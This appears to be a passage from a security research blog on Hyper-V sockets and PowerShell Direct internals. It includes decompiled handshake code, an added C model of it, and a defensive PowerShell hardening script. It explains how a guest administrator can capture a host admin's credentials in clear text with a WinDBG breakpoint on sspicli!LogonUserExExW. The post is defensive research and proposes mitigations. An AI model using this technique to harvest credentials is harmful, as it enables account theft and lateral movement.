<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v20</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 260, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: blue; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">strcmp_0</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">((</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v20</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EMPTYPW"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> && (</span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; 
font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v21</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF) )</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we take that part of the protocol from the PowerShell source and compile it into a standalone module, we can communicate with the guest OS and execute commands as the user whose credentials we send (icsvc passes them to LogonUserExExW and starts the PowerShell process under those credentials).</span></div>
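<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Added illustration (not code from icsvc.dll, the PowerShell sources or ClientExample): a C model of the guest-side control flow in the decompiled condition above, run over an in-memory stand-in for the Hyper-V socket so the EMPTYPW short-circuit and the failure paths can be traced. Assumptions: model_sock, model_recv, model_send and the case_* functions are invented names, the four buffers are numbered because the fragment shows only their sizes and the EMPTYPW marker, and the byte streams are constructed all-zero samples.</span></div>

```c
/* Model of the guest-side handshake in icsvc.dll, mirroring the decompiled
 * if() shown above.  Added illustration, not Microsoft's or the blog's code.
 * The real code reads from a Hyper-V socket; an in-memory stream stands in
 * here so the control flow (especially the EMPTYPW short-circuit) is visible. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD1_LEN 520   /* buffer sizes taken from the recv() calls in the listing */
#define FIELD2_LEN 520
#define FIELD3_LEN 260
#define FIELD4_LEN 520

typedef struct {
    const unsigned char *in;  /* bytes arriving from the host side (constructed) */
    size_t in_len, in_pos;
    int acks;                 /* "PASS" replies the guest side has sent so far */
    int fail_send;            /* constructed fault: make every send() fail */
} model_sock;

/* Stand-ins for recv()/send(); -1 is the 0xFFFFFFFF of the decompiled output
 * (peer closed the connection or the transport failed). */
static int model_recv(model_sock *s, char *buf, size_t len) {
    if (s->in_len - s->in_pos < len) return -1;
    memcpy(buf, s->in + s->in_pos, len);
    s->in_pos += len;
    return (int)len;
}
static int model_send(model_sock *s, const char *buf, size_t len) {
    if (s->fail_send) return -1;
    if (len == 4 && memcmp(buf, "PASS", 4) == 0) s->acks++;
    return (int)len;
}

/* One-to-one with the decompiled condition: returns -1 if any step failed
 * (the original then abandons the session), otherwise the number of "PASS"
 * acknowledgements sent.  Note the precedence of && over ||: the fourth
 * 520-byte field is read only when field 3 is NOT the string "EMPTYPW". */
int icsvc_handshake(model_sock *s) {
    char f1[FIELD1_LEN], f2[FIELD2_LEN], f3[FIELD3_LEN], f4[FIELD4_LEN];
    if (model_recv(s, f1, FIELD1_LEN) == -1
     || model_send(s, "PASS", 4) == -1
     || model_recv(s, f2, FIELD2_LEN) == -1
     || model_send(s, "PASS", 4) == -1
     || model_recv(s, f3, FIELD3_LEN) == -1
     || (strcmp(f3, "EMPTYPW") != 0                 /* strcmp_0 in the listing */
         && (model_send(s, "PASS", 4) == -1
             || model_recv(s, f4, FIELD4_LEN) == -1)))
        return -1;
    return s->acks;
}

/* Constructed host-side byte stream: all-zero fields, because only the field
 * lengths and the EMPTYPW marker matter for the control flow shown here. */
static unsigned char stream[FIELD1_LEN + FIELD2_LEN + FIELD3_LEN + FIELD4_LEN];

static int run_case(size_t bytes_available, const char *field3_text, int fail_send) {
    memset(stream, 0, sizeof stream);
    strcpy((char *)stream + FIELD1_LEN + FIELD2_LEN, field3_text);
    model_sock s = { .in = stream, .in_len = bytes_available, .in_pos = 0,
                     .acks = 0, .fail_send = fail_send };
    return icsvc_handshake(&s);
}

/* Field 3 is "EMPTYPW": three fields (1300 bytes), fourth never requested -> 2 acks. */
int case_empty_password(void)   { return run_case(1300, "EMPTYPW", 0); }
/* Field 3 is anything else: guest acks a third time and reads field 4 -> 3 acks. */
int case_with_password(void)    { return run_case(1820, "", 0); }
/* Same marker but the peer stops after 1300 bytes: the fourth recv fails -> -1. */
int case_peer_closed_early(void){ return run_case(1300, "", 0); }
/* Transport failure on the first send() aborts immediately -> -1. */
int case_send_failure(void)     { return run_case(1820, "", 1); }

int main(void) {
    printf("EMPTYPW marker      : %d\n", case_empty_password());
    printf("password field sent : %d\n", case_with_password());
    printf("peer closed early   : %d\n", case_peer_closed_early());
    printf("send failure        : %d\n", case_send_failure());
    return 0;
}
```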
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Of course, this is not a vulnerability in the Hyper-V sockets mechanism (it was designed like ordinary TCP sockets, which do not need any special permission to work), but it looks like it could be described more accurately in the Microsoft docs.</span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-76486583553595283022017-05-11T10:34:00.003-07:002017-05-11T10:34:45.648-07:00PowerShell Direct (few internals)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Some thoughts about the new Windows Server 2016 and Windows 10 Hyper-V feature, PowerShell Direct. It is used to send commands from the host OS to a guest OS without any network connection. You can read about it at </span><a href="https://blogs.technet.microsoft.com/virtualization/2015/05/14/powershell-direct-running-powershell-inside-a-virtual-machine-from-the-hyper-v-host/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://blogs.technet.microsoft.com/virtualization/2015/05/14/powershell-direct-running-powershell-inside-a-virtual-machine-from-the-hyper-v-host/</span></a></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the host OS you can enter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enter-PSSession </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Invoke-Command </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-ScriptBlock</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { Commands } </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and then execute commands in the guest OS. Before a command can run, you have to enter guest OS credentials with local administrator privileges. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="185" src="https://lh6.googleusercontent.com/1S1d9R07hAOa9bjoz4Bzue9RddKTlNSJtJiXYgmCnrRhfDjQtYSHH2WHM3-nC4GYCOz7YkH_lnOgTYGcCFbJmm8H1PicFhFCsmh_BTfozFegwIB--y2Jl8E76jvs1hheDHsFKYF5DrOTEaPZdQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="216" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After you enter them, the PowerShell process on the host sends the data to the guest OS over a Hyper-V socket (from the PowerShell source):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] domain = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.Domain);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] userName = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.UserName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] password = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.Password);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(domain);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(userName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(password);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the guest OS this is handled by icsvc.dll (the virtual machine integration component services), which runs as a service inside svchost.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="265" src="https://lh5.googleusercontent.com/7RtvxrMyHysqiFEqrKqM71oiX45JZBpoM6YbbElWc3kSHh2LFjZL7kmNXPjYe50Yq9gaYwF3nXM-NEMm98O9ufz1tK6ZG97JCZFo5NphsVTlThvmlP3-bGkHTaqwn1CQnpfPB_OSrrJRWE0wFA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="195" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A guest OS administrator can attach WinDBG to that svchost.exe instance, enter </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bp sspicli!LogonUserExExW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">g </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(and yes, before that he can enter </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.logopen</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and go to sleep). When the host OS administrator enters the guest OS credentials, WinDBG breaks on </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">sspicli!LogonUserExExW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and the login and password are visible in clear text.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img alt="C:\Users\Arthur\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Example.png" height="245" src="https://lh3.googleusercontent.com/-ubvTX54X6QD6xuELasdErXoJyv12TO2CNo2p3xF9CcGul1DhdZaEaXn5pa-LnTNSH3HP5sWMp5vb_3D1NWIuUgTiqpQtXiiCLGcyh1BS1qYM-NFEoHOaGsxPqocsn51S0n6SIFvaXEn0J2hCg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="364" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These credentials are needed to start the powershell.exe process (via the CreateProcessAsUserW function). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is not a bug, but it does create a nuance for enterprise environments: you cannot safely use PowerShell Direct if the guest OS has more than one administrator and that administrator is not also a Hyper-V admin. He can capture your credentials very easily, with no need to brute-force them.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So it is a reasonable attack-continuation scenario in VDI and Terminal Services virtual machine environments, where an ordinary user may escalate to local admin. You can reduce the risk by using unique local credentials for every virtual machine. And if you use a domain account for PowerShell Direct, don't forget to limit the machines it can log on to in the account properties.</span></div>
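<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Added example (this is not code from the post): a host-side PowerShell script that audits the guest-side precondition for the scenario above, namely other members of the local Administrators group, and then applies the two mitigations just mentioned: a unique local admin per VM and a logon-workstation restriction for a domain account. It assumes Windows Server 2016 or Windows 10 guests (for the LocalAccounts cmdlets), the Hyper-V PowerShell module on the host and, for the domain-account part, the RSAT ActiveDirectory module. The account naming scheme (psd- followed by the VM name), the parameter names and the file name used to store the credentials are this example's own choices.</span></div>

```powershell
# Added example, not code from the post. Host-side script that (1) lists the other
# local administrators in each guest, i.e. the people who can attach a debugger to
# the icsvc svchost and read the credential you are about to send, (2) gives every
# VM its own local admin with its own random password, and (3) pins a domain
# account used for PowerShell Direct to the guests it may log on to.
# Assumptions: Windows Server 2016 / Windows 10 guests (Get-LocalGroupMember etc.),
# the Hyper-V module on the host, RSAT ActiveDirectory for step 3. The 'psd-<vm>'
# naming and the parameter names are this example's own.
#Requires -RunAsAdministrator
param(
    [string[]] $VMNames = (Get-VM | Where-Object State -eq 'Running').Name,
    [pscredential] $BootstrapCred = (Get-Credential -Message 'Current guest admin credential'),
    [string] $DomainAccount   # optional: sAMAccountName of a domain account used for PowerShell Direct
)

$bootstrapUser = ($BootstrapCred.UserName -split '\\')[-1]

foreach ($vm in $VMNames) {
    # 1. Audit: every other member of Administrators can capture the credential
    #    (bp sspicli!LogonUserExExW in the icsvc svchost, as described above).
    $admins = Invoke-Command -VMName $vm -Credential $BootstrapCred -ScriptBlock {
        Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, ObjectClass, PrincipalSource
    }
    $others = $admins | Where-Object { $_.Name -notlike "*\$bootstrapUser" }
    if ($others) {
        Write-Warning ("{0}: other local admins can read PowerShell Direct credentials: {1}" -f $vm, ($others.Name -join ', '))
    }

    # 2. Mitigation: a per-VM local admin with a random password. A credential
    #    captured inside this guest then opens no other guest.
    $user  = "psd-$($vm.ToLower())"
    $bytes = New-Object byte[] 24
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    $pass  = ConvertTo-SecureString ([Convert]::ToBase64String($bytes)) -AsPlainText -Force

    # SecureString parameters are protected with the PSRP session key in transit.
    Invoke-Command -VMName $vm -Credential $BootstrapCred -ArgumentList $user, $pass -ScriptBlock {
        param($u, $p)
        if (Get-LocalUser -Name $u -ErrorAction SilentlyContinue) {
            Set-LocalUser -Name $u -Password $p
        } else {
            New-LocalUser -Name $u -Password $p -PasswordNeverExpires | Out-Null
            Add-LocalGroupMember -Group 'Administrators' -Member $u
        }
    }

    # Keep the new credential DPAPI-protected for the host account running this script
    # (Export-Clixml encrypts the password part of a PSCredential on Windows).
    [pscredential]::new($user, $pass) |
        Export-Clixml -Path (Join-Path $env:LOCALAPPDATA "psdirect-$vm.xml")
}

# 3. If a domain account is used instead, restrict where it may log on. The logon
#    happens via LogonUserExExW inside the guest, so the list is the guests'
#    computer names (assumed here to equal the VM names).
if ($DomainAccount) {
    Set-ADUser -Identity $DomainAccount -LogonWorkstations ($VMNames -join ',')
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Later sessions use the stored per-VM credential (Import-Clixml on the same host account) with Invoke-Command -VMName, so the only credential that can ever be captured inside a guest is the one valid for that guest alone. The audit in step 1 is the part worth running regularly: the moment a second administrator appears in a guest, that guest's PowerShell Direct credential should be treated as shared with him.</span></div>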
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-53339244676000692552017-02-23T06:07:00.003-08:002017-05-31T06:46:17.389-07:00Hyper-V sockets (without internals)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
